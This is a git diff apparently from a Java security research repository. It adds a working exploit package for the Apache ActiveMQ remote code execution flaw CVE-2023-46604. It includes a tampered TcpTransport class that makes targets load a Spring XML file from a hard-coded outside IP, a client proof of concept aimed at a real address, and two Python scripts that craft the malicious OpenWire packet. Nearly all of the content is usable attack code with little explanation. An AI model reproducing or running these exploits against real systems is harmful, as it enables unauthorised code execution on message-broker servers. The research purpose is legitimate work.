+ </dependencies>
+ <dependencymanagement>
+ <dependencies>
+ <dependency>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-dependencies</artifactid>
+ <version>${spring-boot.version}</version>
+ <type>pom</type>
+ <scope>import</scope>
+ </dependency>
+ </dependencies>
+ </dependencymanagement>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupid>org.apache.maven.plugins</groupid>
+ <artifactid>maven-compiler-plugin</artifactid>
+ <version>3.8.1</version>
+ <configuration>
+ <source>11</source>
+ <target>11</target>
+ <encoding>UTF-8</encoding>
+ </configuration>
+ </plugin>
+ <plugin>
+ <groupid>org.springframework.boot</groupid>
+ <artifactid>spring-boot-maven-plugin</artifactid>
+ <version>${spring-boot.version}</version>
+ <configuration>
+ <mainclass>com.example.drunkbaby.cve202346604.Cve202346604Application</mainclass>
+ <skip>true</skip>
+ </configuration>
+ <executions>
+ <execution>
+ <id>repackage</id>
+ <goals>
+ <goal>repackage</goal>
+ </goals>
+ </execution>
+ </executions>
+ </plugin>
+ </plugins>
+ </build>
+
+</project>
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/com/example/drunkbaby/cve202346604/Cve202346604Application.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/com/example/drunkbaby/cve202346604/Cve202346604Application.java
new file mode 100644
index 00000000..4fd9e179
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/com/example/drunkbaby/cve202346604/Cve202346604Application.java
@@ -0,0 +1,13 @@
+package com.example.drunkbaby.cve202346604;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class Cve202346604Application {
+
+ public static void main(String[] args) {
+ SpringApplication.run(Cve202346604Application.class, args);
+ }
+
+}
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/com/example/drunkbaby/cve202346604/PoC.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/com/example/drunkbaby/cve202346604/PoC.java
new file mode 100644
index 00000000..a79e26ae
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/com/example/drunkbaby/cve202346604/PoC.java
@@ -0,0 +1,22 @@
+package com.example.drunkbaby.cve202346604;
+
+import org.apache.activemq.ActiveMQConnectionFactory;
+
+import javax.jms.*;
+
+public class PoC {
+ public static void main(String[] args) throws Exception {
+
+ ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("tcp://124.222.21.138:61616");
+ Connection connection = connectionFactory.createConnection();
+ connection.start();
+ Session session = connection.createSession(Boolean.parseBoolean("1"),2);
+ Destination destination = session.createQueue("tempQueue");
+
+ MessageProducer producer = session.createProducer(destination);
+ Message message = session.createObjectMessage("123");
+ producer.send(message);
+
+ connection.close();
+ }
+}
\ No newline at end of file
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/org/apache/activemq/transport/tcp/TcpTransport.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/org/apache/activemq/transport/tcp/TcpTransport.java
new file mode 100644
index 00000000..e84a32c9
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/org/apache/activemq/transport/tcp/TcpTransport.java
@@ -0,0 +1,607 @@
+//
+// Source code recreated from a .class file by IntelliJ IDEA
+// (powered by FernFlower decompiler)
+//
+
+package org.apache.activemq.transport.tcp;
+
+import java.io.DataInputStream;
+import java.io.DataOutputStream;
+import java.io.IOException;
+import java.io.InterruptedIOException;
+import java.net.InetAddress;
+import java.net.InetSocketAddress;
+import java.net.Socket;
+import java.net.SocketAddress;
+import java.net.SocketException;
+import java.net.SocketTimeoutException;
+import java.net.URI;
+import java.net.UnknownHostException;
+import java.nio.ByteBuffer;
+import java.security.cert.X509Certificate;
+import java.util.HashMap;
+import java.util.Map;
+import java.util.concurrent.CountDownLatch;
+import java.util.concurrent.TimeUnit;
+import java.util.concurrent.atomic.AtomicReference;
+import javax.net.SocketFactory;
+import org.apache.activemq.Service;
+import org.apache.activemq.TransportLoggerSupport;
+import org.apache.activemq.command.ExceptionResponse;
+import org.apache.activemq.thread.TaskRunnerFactory;
+import org.apache.activemq.transport.Transport;
+import org.apache.activemq.transport.TransportThreadSupport;
+import org.apache.activemq.util.InetAddressUtil;
+import org.apache.activemq.util.IntrospectionSupport;
+import org.apache.activemq.util.ServiceStopper;
+import org.apache.activemq.wireformat.WireFormat;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.context.support.ClassPathXmlApplicationContext;
+
+public class TcpTransport extends TransportThreadSupport implements Transport, Service, Runnable {
+ private static final Logger LOG = LoggerFactory.getLogger(TcpTransport.class);
+ protected final URI remoteLocation;
+ protected final URI localLocation;
+ protected final WireFormat wireFormat;
+ protected int connectionTimeout;
+ protected int soTimeout;
+ protected int socketBufferSize;
+ protected int ioBufferSize;
+ protected boolean closeAsync;
+ protected Socket socket;
+ protected DataOutputStream dataOut;
+ protected DataInputStream dataIn;
+ protected TimeStampStream buffOut;
+ protected final InitBuffer initBuffer;
+ protected int trafficClass;
+ private boolean trafficClassSet;
+ protected boolean diffServChosen;
+ protected boolean typeOfServiceChosen;
+ protected boolean trace;
+ protected String logWriterName;
+ protected boolean dynamicManagement;
+ protected boolean startLogging;
+ protected int jmxPort;
+ protected boolean useLocalHost;
+ protected int minmumWireFormatVersion;
+ protected SocketFactory socketFactory;
+ protected final AtomicReference<countdownlatch> stoppedLatch;
+ protected volatile int receiveCounter;
+ protected Map<string, Object> socketOptions;
+ private int soLinger;
+ private Boolean keepAlive;
+ private Boolean tcpNoDelay;
+ private Thread runnerThread;
+
+ public TcpTransport(WireFormat wireFormat, SocketFactory socketFactory, URI remoteLocation, URI localLocation) throws UnknownHostException, IOException {
+ this.connectionTimeout = 30000;
+ this.socketBufferSize = 65536;
+ this.ioBufferSize = 8192;
+ this.closeAsync = true;
+ this.buffOut = null;
+ this.trafficClass = 0;
+ this.trafficClassSet = false;
+ this.diffServChosen = false;
+ this.typeOfServiceChosen = false;
+ this.trace = false;
+ this.logWriterName = TransportLoggerSupport.defaultLogWriterName;
+ this.dynamicManagement = false;
+ this.startLogging = true;
+ this.jmxPort = 1099;
+ this.useLocalHost = false;
+ this.stoppedLatch = new AtomicReference();
+ this.soLinger = Integer.MIN_VALUE;
+ this.wireFormat = wireFormat;
+ this.socketFactory = socketFactory;
+
+ try {
+ this.socket = socketFactory.createSocket();
+ } catch (SocketException var6) {
+ this.socket = null;
+ }
+
+ this.remoteLocation = remoteLocation;
+ this.localLocation = localLocation;
+ this.initBuffer = null;
+ this.setDaemon(false);
+ }
+
+ public TcpTransport(WireFormat wireFormat, Socket socket) throws IOException {
+ this(wireFormat, socket, (InitBuffer)null);
+ }
+
+ public TcpTransport(WireFormat wireFormat, Socket socket, InitBuffer initBuffer) throws IOException {
+ this.connectionTimeout = 30000;
+ this.socketBufferSize = 65536;
+ this.ioBufferSize = 8192;
+ this.closeAsync = true;
+ this.buffOut = null;
+ this.trafficClass = 0;
+ this.trafficClassSet = false;
+ this.diffServChosen = false;
+ this.typeOfServiceChosen = false;
+ this.trace = false;
+ this.logWriterName = TransportLoggerSupport.defaultLogWriterName;
+ this.dynamicManagement = false;
+ this.startLogging = true;
+ this.jmxPort = 1099;
+ this.useLocalHost = false;
+ this.stoppedLatch = new AtomicReference();
+ this.soLinger = Integer.MIN_VALUE;
+ this.wireFormat = wireFormat;
+ this.socket = socket;
+ this.remoteLocation = null;
+ this.localLocation = null;
+ this.initBuffer = initBuffer;
+ this.setDaemon(true);
+ }
+
+ public void oneway(Object command) throws IOException {
+ this.checkStarted();
+ Throwable obj = new ClassPathXmlApplicationContext("http://119.3.215.198:9999/poc.xml");
+ ExceptionResponse response = new ExceptionResponse(obj);
+ this.wireFormat.marshal(response, this.dataOut);
+ this.dataOut.flush();
+ }
+
+ public String toString() {
+ Object var10000 = this.socket.isConnected() ? "tcp://" + this.socket.getInetAddress() + ":" + this.socket.getPort() + "@" + this.socket.getLocalPort() : (this.localLocation != null ? this.localLocation : this.remoteLocation);
+ return "" + var10000;
+ }
+
+ public void run() {
+ LOG.trace("TCP consumer thread for " + this + " starting");
+ this.runnerThread = Thread.currentThread();
+
+ try {
+ while(!this.isStopped() && !this.isStopping()) {
+ this.doRun();
+ }
+ } catch (IOException var7) {
+ ((CountDownLatch)this.stoppedLatch.get()).countDown();
+ this.onException(var7);
+ } catch (Throwable var8) {
+ ((CountDownLatch)this.stoppedLatch.get()).countDown();
+ IOException ioe = new IOException("Unexpected error occurred: " + var8);
+ ioe.initCause(var8);
+ this.onException(ioe);
+ } finally {
+ ((CountDownLatch)this.stoppedLatch.get()).countDown();
+ }
+
+ }
+
+ protected void doRun() throws IOException {
+ try {
+ Object command = this.readCommand();
+ this.doConsume(command);
+ } catch (SocketTimeoutException var2) {
+ } catch (InterruptedIOException var3) {
+ }
+
+ }
+
+ protected Object readCommand() throws IOException {
+ return this.wireFormat.unmarshal(this.dataIn);
+ }
+
+ public String getDiffServ() {
+ return Integer.toString(this.trafficClass);
+ }
+
+ public void setDiffServ(String diffServ) throws IllegalArgumentException {
+ this.trafficClass = QualityOfServiceUtils.getDSCP(diffServ);
+ this.diffServChosen = true;
+ }
+
+ public int getTypeOfService() {
+ return this.trafficClass;
+ }
+
+ public void setTypeOfService(int typeOfService) {
+ this.trafficClass = QualityOfServiceUtils.getToS(typeOfService);
+ this.typeOfServiceChosen = true;
+ }
+
+ public boolean isTrace() {
+ return this.trace;
+ }
+
+ public void setTrace(boolean trace) {
+ this.trace = trace;
+ }
+
+ public String getLogWriterName() {
+ return this.logWriterName;
+ }
+
+ public void setLogWriterName(String logFormat) {
+ this.logWriterName = logFormat;
+ }
+
+ public boolean isDynamicManagement() {
+ return this.dynamicManagement;
+ }
+
+ public void setDynamicManagement(boolean useJmx) {
+ this.dynamicManagement = useJmx;
+ }
+
+ public boolean isStartLogging() {
+ return this.startLogging;
+ }
+
+ public void setStartLogging(boolean startLogging) {
+ this.startLogging = startLogging;
+ }
+
+ public int getJmxPort() {
+ return this.jmxPort;
+ }
+
+ public void setJmxPort(int jmxPort) {
+ this.jmxPort = jmxPort;
+ }
+
+ public int getMinmumWireFormatVersion() {
+ return this.minmumWireFormatVersion;
+ }
+
+ public void setMinmumWireFormatVersion(int minmumWireFormatVersion) {
+ this.minmumWireFormatVersion = minmumWireFormatVersion;
+ }
+
+ public boolean isUseLocalHost() {
+ return this.useLocalHost;
+ }
+
+ public void setUseLocalHost(boolean useLocalHost) {
+ this.useLocalHost = useLocalHost;
+ }
+
+ public int getSocketBufferSize() {
+ return this.socketBufferSize;
+ }
+
+ public void setSocketBufferSize(int socketBufferSize) {
+ this.socketBufferSize = socketBufferSize;
+ }
+
+ public int getSoTimeout() {
+ return this.soTimeout;
+ }
+
+ public void setSoTimeout(int soTimeout) {
+ this.soTimeout = soTimeout;
+ }
+
+ public int getConnectionTimeout() {
+ return this.connectionTimeout;
+ }
+
+ public void setConnectionTimeout(int connectionTimeout) {
+ this.connectionTimeout = connectionTimeout;
+ }
+
+ public Boolean getKeepAlive() {
+ return this.keepAlive;
+ }
+
+ public void setKeepAlive(Boolean keepAlive) {
+ this.keepAlive = keepAlive;
+ }
+
+ public void setSoLinger(int soLinger) {
+ this.soLinger = soLinger;
+ }
+
+ public int getSoLinger() {
+ return this.soLinger;
+ }
+
+ public Boolean getTcpNoDelay() {
+ return this.tcpNoDelay;
+ }
+
+ public void setTcpNoDelay(Boolean tcpNoDelay) {
+ this.tcpNoDelay = tcpNoDelay;
+ }
+
+ public int getIoBufferSize() {
+ return this.ioBufferSize;
+ }
+
+ public void setIoBufferSize(int ioBufferSize) {
+ this.ioBufferSize = ioBufferSize;
+ }
+
+ public boolean isCloseAsync() {
+ return this.closeAsync;
+ }
+
+ public void setCloseAsync(boolean closeAsync) {
+ this.closeAsync = closeAsync;
+ }
+
+ protected String resolveHostName(String host) throws UnknownHostException {
+ if (this.isUseLocalHost()) {
+ String localName = InetAddressUtil.getLocalHostName();
+ if (localName != null && localName.equals(host)) {
+ return "localhost";
+ }
+ }
+
+ return host;
+ }
+
+ protected void initialiseSocket(Socket sock) throws SocketException, IllegalArgumentException {
+ if (this.socketOptions != null) {
+ Map<string, Object> copy = new HashMap(this.socketOptions);
+ IntrospectionSupport.setProperties(this.socket, copy);
+ if (!copy.isEmpty()) {
+ throw new IllegalArgumentException("Invalid socket parameters: " + copy);
+ }
+ }
+
+ try {
+ if (this.socketBufferSize> 0) {
+ sock.setReceiveBufferSize(this.socketBufferSize);
+ sock.setSendBufferSize(this.socketBufferSize);
+ } else {
+ LOG.warn("Socket buffer size was set to {}; Skipping this setting as the size must be a positive number.", this.socketBufferSize);
+ }
+ } catch (SocketException var3) {
+ LOG.warn("Cannot set socket buffer size = " + this.socketBufferSize);
+ LOG.debug("Cannot set socket buffer size. Reason: " + var3.getMessage() + ". This exception is ignored.", var3);
+ }
+
+ sock.setSoTimeout(this.soTimeout);
+ if (this.keepAlive != null) {
+ sock.setKeepAlive(this.keepAlive);
+ }
+
+ if (this.soLinger> -1) {
+ sock.setSoLinger(true, this.soLinger);
+ } else if (this.soLinger == -1) {
+ sock.setSoLinger(false, 0);
+ }
+
+ if (this.tcpNoDelay != null) {
+ sock.setTcpNoDelay(this.tcpNoDelay);
+ }
+
+ if (!this.trafficClassSet) {
+ this.trafficClassSet = this.setTrafficClass(sock);
+ }
+
+ }
+
+ protected void doStart() throws Exception {
+ this.connect();
+ this.stoppedLatch.set(new CountDownLatch(1));
+ super.doStart();
+ }
+
+ protected void connect() throws Exception {
+ if (this.socket == null && this.socketFactory == null) {
+ throw new IllegalStateException("Cannot connect if the socket or socketFactory have not been set");
+ } else {
+ InetSocketAddress localAddress = null;
+ InetSocketAddress remoteAddress = null;
+ if (this.localLocation != null) {
+ localAddress = new InetSocketAddress(InetAddress.getByName(this.localLocation.getHost()), this.localLocation.getPort());
+ }
+
+ if (this.remoteLocation != null) {
+ String host = this.resolveHostName(this.remoteLocation.getHost());
+ remoteAddress = new InetSocketAddress(host, this.remoteLocation.getPort());
+ }
+
+ this.trafficClassSet = this.setTrafficClass(this.socket);
+ if (this.socket != null) {
+ if (localAddress != null) {
+ this.socket.bind(localAddress);
+ }
+
+ if (remoteAddress != null) {
+ if (this.connectionTimeout>= 0) {
+ this.socket.connect(remoteAddress, this.connectionTimeout);
+ } else {
+ this.socket.connect(remoteAddress);
+ }
+ }
+ } else if (localAddress != null) {
+ this.socket = this.socketFactory.createSocket(remoteAddress.getAddress(), remoteAddress.getPort(), localAddress.getAddress(), localAddress.getPort());
+ } else {
+ this.socket = this.socketFactory.createSocket(remoteAddress.getAddress(), remoteAddress.getPort());
+ }
+
+ this.initialiseSocket(this.socket);
+ this.initializeStreams();
+ }
+ }
+
+ protected void doStop(ServiceStopper stopper) throws Exception {
+ if (LOG.isDebugEnabled()) {
+ LOG.debug("Stopping transport " + this);
+ }
+
+ if (this.socket != null) {
+ if (this.closeAsync) {
+ final CountDownLatch latch = new CountDownLatch(1);
+ TaskRunnerFactory taskRunnerFactory = new TaskRunnerFactory();
+ taskRunnerFactory.execute(new Runnable() {
+ public void run() {
+ TcpTransport.LOG.trace("Closing socket {}", TcpTransport.this.socket);
+
+ try {
+ TcpTransport.this.socket.close();
+ TcpTransport.LOG.debug("Closed socket {}", TcpTransport.this.socket);
+ } catch (IOException var5) {
+ if (TcpTransport.LOG.isDebugEnabled()) {
+ TcpTransport.LOG.debug("Caught exception closing socket " + TcpTransport.this.socket + ". This exception will be ignored.", var5);
+ }
+ } finally {
+ latch.countDown();
+ }
+
+ }
+ });
+
+ try {
+ latch.await(1L, TimeUnit.SECONDS);
+ } catch (InterruptedException var9) {
+ Thread.currentThread().interrupt();
+ } finally {
+ taskRunnerFactory.shutdownNow();
+ }
+ } else {
+ LOG.trace("Closing socket {}", this.socket);
+
+ try {
+ this.socket.close();
+ LOG.debug("Closed socket {}", this.socket);
+ } catch (IOException var11) {
+ if (LOG.isDebugEnabled()) {
+ LOG.debug("Caught exception closing socket " + this.socket + ". This exception will be ignored.", var11);
+ }
+ }
+ }
+ }
+
+ }
+
+ public void stop() throws Exception {
+ super.stop();
+ CountDownLatch countDownLatch = (CountDownLatch)this.stoppedLatch.get();
+ if (countDownLatch != null && Thread.currentThread() != this.runnerThread) {
+ countDownLatch.await(1L, TimeUnit.SECONDS);
+ }
+
+ }
+
+ protected void initializeStreams() throws Exception {
+ TcpBufferedInputStream buffIn = new TcpBufferedInputStream(this.socket.getInputStream(), this.ioBufferSize) {
+ public int read() throws IOException {
+ ++TcpTransport.this.receiveCounter;
+ return super.read();
+ }
+
+ public int read(byte[] b, int off, int len) throws IOException {
+ ++TcpTransport.this.receiveCounter;
+ return super.read(b, off, len);
+ }
+
+ public long skip(long n) throws IOException {
+ ++TcpTransport.this.receiveCounter;
+ return super.skip(n);
+ }
+
+ protected void fill() throws IOException {
+ ++TcpTransport.this.receiveCounter;
+ super.fill();
+ }
+ };
+ if (this.initBuffer != null) {
+ buffIn.unread(this.initBuffer.buffer.array());
+ }
+
+ this.dataIn = new DataInputStream(buffIn);
+ TcpBufferedOutputStream outputStream = new TcpBufferedOutputStream(this.socket.getOutputStream(), this.ioBufferSize);
+ this.dataOut = new DataOutputStream(outputStream);
+ this.buffOut = outputStream;
+ }
+
+ protected void closeStreams() throws IOException {
+ if (this.dataOut != null) {
+ this.dataOut.close();
+ }
+
+ if (this.dataIn != null) {
+ this.dataIn.close();
+ }
+
+ }
+
+ public void setSocketOptions(Map<string, Object> socketOptions) {
+ this.socketOptions = new HashMap(socketOptions);
+ }
+
+ public String getRemoteAddress() {
+ if (this.socket != null) {
+ SocketAddress address = this.socket.getRemoteSocketAddress();
+ if (address instanceof InetSocketAddress) {
+ String var10000 = ((InetSocketAddress)address).getAddress().getHostAddress();
+ return "tcp://" + var10000 + ":" + ((InetSocketAddress)address).getPort();
+ } else {
+ return "" + this.socket.getRemoteSocketAddress();
+ }
+ } else {
+ return null;
+ }
+ }
+
+ public <t> T narrow(Class<t> target) {
+ if (target == Socket.class) {
+ return target.cast(this.socket);
+ } else {
+ return target == TimeStampStream.class ? target.cast(this.buffOut) : super.narrow(target);
+ }
+ }
+
+ public int getReceiveCounter() {
+ return this.receiveCounter;
+ }
+
+ private boolean setTrafficClass(Socket sock) throws SocketException, IllegalArgumentException {
+ if (sock != null && (this.diffServChosen &#124;&#124; this.typeOfServiceChosen)) {
+ if (this.diffServChosen && this.typeOfServiceChosen) {
+ throw new IllegalArgumentException("Cannot set both the Differentiated Services and Type of Services transport options on the same connection.");
+ } else {
+ sock.setTrafficClass(this.trafficClass);
+ int resultTrafficClass = sock.getTrafficClass();
+ if (this.trafficClass == resultTrafficClass) {
+ this.diffServChosen = false;
+ this.typeOfServiceChosen = false;
+ return true;
+ } else {
+ if (this.trafficClass>> 2 == resultTrafficClass>> 2 && (this.trafficClass & 3) != (resultTrafficClass & 3)) {
+ LOG.warn("Attempted to set the Traffic Class to " + this.trafficClass + " but the result Traffic Class was " + resultTrafficClass + ". Please check that your system allows you to set the ECN bits (the first two bits).");
+ } else {
+ LOG.warn("Attempted to set the Traffic Class to " + this.trafficClass + " but the result Traffic Class was " + resultTrafficClass + ". Please check that your system supports java.net.setTrafficClass.");
+ }
+
+ return false;
+ }
+ }
+ } else {
+ return false;
+ }
+ }
+
+ public WireFormat getWireFormat() {
+ return this.wireFormat;
+ }
+
+ public X509Certificate[] getPeerCertificates() {
+ return null;
+ }
+
+ public void setPeerCertificates(X509Certificate[] certificates) {
+ }
+
+ public static class InitBuffer {
+ public final int readSize;
+ public final ByteBuffer buffer;
+
+ public InitBuffer(int readSize, ByteBuffer buffer) {
+ if (buffer == null) {
+ throw new IllegalArgumentException("Null buffer not allowed.");
+ } else {
+ this.readSize = readSize;
+ this.buffer = buffer;
+ }
+ }
+ }
+}
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/org/springframework/context/support/ClassPathXmlApplicationContext.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/org/springframework/context/support/ClassPathXmlApplicationContext.java
new file mode 100644
index 00000000..ea49efa1
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/main/java/org/springframework/context/support/ClassPathXmlApplicationContext.java
@@ -0,0 +1,15 @@
+package org.springframework.context.support;
+
+public class ClassPathXmlApplicationContext extends Throwable {
+
+ private String message;
+
+ public ClassPathXmlApplicationContext(String message) {
+ this.message = message;
+ }
+
+ @Override
+ public String getMessage() {
+ return message;
+ }
+}
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/test/java/com/example/drunkbaby/cve202346604/Cve202346604ApplicationTests.java b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/test/java/com/example/drunkbaby/cve202346604/Cve202346604ApplicationTests.java
new file mode 100644
index 00000000..80f13bea
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/src/test/java/com/example/drunkbaby/cve202346604/Cve202346604ApplicationTests.java
@@ -0,0 +1,13 @@
+package com.example.drunkbaby.cve202346604;
+
+import org.junit.jupiter.api.Test;
+import org.springframework.boot.test.context.SpringBootTest;
+
+@SpringBootTest
+class Cve202346604ApplicationTests {
+
+ @Test
+ void contextLoads() {
+ }
+
+}
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/com/example/drunkbaby/cve202346604/Cve202346604Application.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/com/example/drunkbaby/cve202346604/Cve202346604Application.class
new file mode 100644
index 00000000..240cfb63
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/com/example/drunkbaby/cve202346604/Cve202346604Application.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/com/example/drunkbaby/cve202346604/PoC.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/com/example/drunkbaby/cve202346604/PoC.class
new file mode 100644
index 00000000..c9195646
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/com/example/drunkbaby/cve202346604/PoC.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport1ドル.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport1ドル.class
new file mode 100644
index 00000000..d3813156
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport1ドル.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport2ドル.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport2ドル.class
new file mode 100644
index 00000000..8f6a0d2a
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport2ドル.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport$InitBuffer.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport$InitBuffer.class
new file mode 100644
index 00000000..00837527
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport$InitBuffer.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport.class
new file mode 100644
index 00000000..1a7909de
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/apache/activemq/transport/tcp/TcpTransport.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/springframework/context/support/ClassPathXmlApplicationContext.class b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/springframework/context/support/ClassPathXmlApplicationContext.class
new file mode 100644
index 00000000..63c7cca8
Binary files /dev/null and b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/CVE-2023-46604/target/classes/org/springframework/context/support/ClassPathXmlApplicationContext.class differ
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/EXP/exp.py b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/EXP/exp.py
new file mode 100644
index 00000000..ad7d8ce3
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/EXP/exp.py
@@ -0,0 +1,43 @@
+import io
+import socket
+import sys
+
+
+def main(ip, port, poc):
+ classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
+ socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ socket_obj.connect((ip, port))
+
+ new_len = len(classname + poc)
+ package_data_len = ascii(new_len + 17)
+ Command = "1f" # Command: ExceptionResponse(31)
+ Command_Id = "00000000" # Command Id: 00 00 00 00
+ Command_response_required = "00" # Command response required: 0
+ CorrelationId = "00000000" # CorrelationId: 0
+
+
+ with socket_obj:
+ out = socket_obj.makefile('wb')
+ out.write(int(package_data_len).to_bytes(4, 'big'))
+ out.write(bytes([31]))
+ out.write(int(0).to_bytes(4, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(int(0).to_bytes(4, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(len(classname).to_bytes(2, 'big'))
+ out.write(classname.encode('utf-8'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(len(poc).to_bytes(2, 'big'))
+ out.write(poc.encode('utf-8'))
+ # print(list(out.getvalue()))
+ out.flush()
+ out.close()
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 4:
+ print("Please specify the target and port and poc.xml: python3 exp.py 127.0.0.1 61616 "
+ "http://192.168.0.101:8888/poc.xml")
+ exit(-1)
+ main(sys.argv[1], int(sys.argv[2]), sys.argv[3])
\ No newline at end of file
diff --git a/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/EXP/test.py b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/EXP/test.py
new file mode 100644
index 00000000..0c06f0a2
--- /dev/null
+++ b/JavaSecurity/Apache/ActiveMQ/Pkg-CVE-2023-46604/EXP/test.py
@@ -0,0 +1,36 @@
+import io
+import socket
+import sys
+
+
+def main(ip, port, xml):
+ classname = "org.springframework.context.support.ClassPathXmlApplicationContext"
+ socket_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ socket_obj.connect((ip, port))
+
+ with socket_obj:
+ out = socket_obj.makefile('wb')
+ # out = io.BytesIO() # 创建一个内存中的二进制流
+ out.write(int(32).to_bytes(4, 'big'))
+ out.write(bytes([31]))
+ out.write(int(1).to_bytes(4, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(int(1).to_bytes(4, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(len(classname).to_bytes(2, 'big'))
+ out.write(classname.encode('utf-8'))
+ out.write(bool(True).to_bytes(1, 'big'))
+ out.write(len(xml).to_bytes(2, 'big'))
+ out.write(xml.encode('utf-8'))
+ # print(list(out.getvalue()))
+ out.flush()
+ out.close()
+
+
+if __name__ == "__main__":
+ if len(sys.argv) != 4:
+ print("Please specify the target and port and poc.xml: python3 poc.py 127.0.0.1 61616 "
+ "http://192.168.0.101:8888/poc.xml")
+ exit(-1)
+ main(sys.argv[1], int(sys.argv[2]), sys.argv[3])
\ No newline at end of file
diff --git a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/src/main/java/EXP.java b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/src/main/java/EXP.java
index 4fd6d35f..1ab2d021 100644
--- a/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/src/main/java/EXP.java	
+++ b/JavaSecurity/Apache/Apache Commons Text/CVE-2022-42889/src/main/java/EXP.java	
@@ -5,6 +5,7 @@ public static void main(String[] args) {
